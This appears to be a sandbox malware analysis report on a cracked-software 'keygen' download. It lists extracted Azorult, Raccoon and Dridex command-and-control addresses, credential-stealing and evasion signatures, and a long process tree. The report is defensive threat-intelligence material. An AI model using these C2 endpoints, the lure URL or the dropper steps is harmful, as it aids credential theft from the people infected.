Overview

overview

10

Static

static

URLScan

urlscan

ﱞﱞﱞ�...ฺฺ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

10

ﱞﱞﱞ�...ﱞﱞ

windows10_x64

ﱞﱞﱞ�...ﱞﱞ

windows7_x64

10

Resubmissions

10-04-2021 05:28

210410-642g16c6y6 10

09-04-2021 16:57

210409-a3zwd3zjvx 10

09-04-2021 05:30

210409-4qr2p4p1m6 10

Analysis

  • max time kernel
    1775s
  • max time network
    1701s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-04-2021 16:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://keygenit.com/d/30f8668638112r4p2203.html

Score
10/10
azorultdridexponyraccoonredline10111a6bfe7e504db71e25642b830fd9b2c4366cf882abotnetdiscoveryevasioninfostealerloaderpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

a6bfe7e504db71e25642b830fd9b2c4366cf882a

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

dridex

Botnet

10111

C2

131.100.24.231:443

188.165.17.91:8443

185.148.169.10:2303
rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

    ratspywarestealerpony
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Dridex Loader 2 IoCs

    Detects Dridex both x86 and x64 loader in memory.

    botnetloader
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 35 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 56 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:856
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2168
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/30f8668638112r4p2203.html
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fefaec6e00,0x7fefaec6e10,0x7fefaec6e20
        2⤵
          PID:892
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1056 /prefetch:2
          2⤵
            PID:296
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1356 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1220
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1756 /prefetch:8
            2⤵
              PID:1092
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
              2⤵
                PID:580
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1352 /prefetch:1
                2⤵
                  PID:576
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:1
                  2⤵
                    PID:1904
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2396 /prefetch:1
                    2⤵
                      PID:1924
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1
                      2⤵
                        PID:1120
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:1
                        2⤵
                          PID:272
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3296 /prefetch:2
                          2⤵
                            PID:2612
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=984 /prefetch:8
                            2⤵
                              PID:2736
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3500 /prefetch:8
                              2⤵
                                PID:2784
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:8
                                2⤵
                                  PID:2860
                                • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                  "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
                                  2⤵
                                    PID:2876
                                    • C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
                                      "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13f9d7740,0x13f9d7750,0x13f9d7760
                                      3⤵
                                        PID:2896
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
                                      2⤵
                                        PID:2936
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4772 /prefetch:8
                                        2⤵
                                          PID:3024
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
                                          2⤵
                                            PID:2168
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3512 /prefetch:8
                                            2⤵
                                              PID:2444
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3192 /prefetch:8
                                              2⤵
                                                PID:2828
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 /prefetch:8
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2788
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3204 /prefetch:8
                                                2⤵
                                                  PID:2868
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:8
                                                  2⤵
                                                    PID:3032
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2392 /prefetch:8
                                                    2⤵
                                                      PID:2916
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2400 /prefetch:8
                                                      2⤵
                                                        PID:2228
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
                                                        2⤵
                                                          PID:2448
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:8
                                                          2⤵
                                                            PID:3008
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:8
                                                            2⤵
                                                              PID:2564
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3192 /prefetch:8
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2584
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4224 /prefetch:8
                                                              2⤵
                                                                PID:1312
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2368 /prefetch:8
                                                                2⤵
                                                                  PID:1328
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8
                                                                  2⤵
                                                                    PID:2076
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2396 /prefetch:8
                                                                    2⤵
                                                                      PID:2412
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2988 /prefetch:8
                                                                      2⤵
                                                                        PID:1600
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
                                                                        2⤵
                                                                          PID:2940
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4212 /prefetch:8
                                                                          2⤵
                                                                            PID:2912
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8
                                                                            2⤵
                                                                              PID:3032
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:1
                                                                              2⤵
                                                                                PID:3024
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
                                                                                2⤵
                                                                                  PID:1404
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                  2⤵
                                                                                    PID:2516
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
                                                                                    2⤵
                                                                                      PID:1716
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2496
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4348 /prefetch:8
                                                                                        2⤵
                                                                                          PID:2056
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4360 /prefetch:8
                                                                                          2⤵
                                                                                            PID:1580
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3092 /prefetch:8
                                                                                            2⤵
                                                                                              PID:956
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im chrome.exe
                                                                                                3⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2792
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3136 /prefetch:8
                                                                                              2⤵
                                                                                                PID:2596
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:2800
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4236 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:1328
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4284 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2904
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4836 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:2984
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4176 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:2976
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:2988
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:3040
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:1404
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4144 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:996
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:1716
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2768 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:2996
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1040,1662009280176923544,17728602301432851137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3064 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:2964
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.crack.zip\Wondershare.Dr.fone.For.5.5.0.crack.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.crack.zip\Wondershare.Dr.fone.For.5.5.0.crack.exe"
                                                                                                                  1⤵
                                                                                                                    PID:1924
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                      2⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:2104
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                        keygen-pr.exe -p83fsase3Ge
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:2452
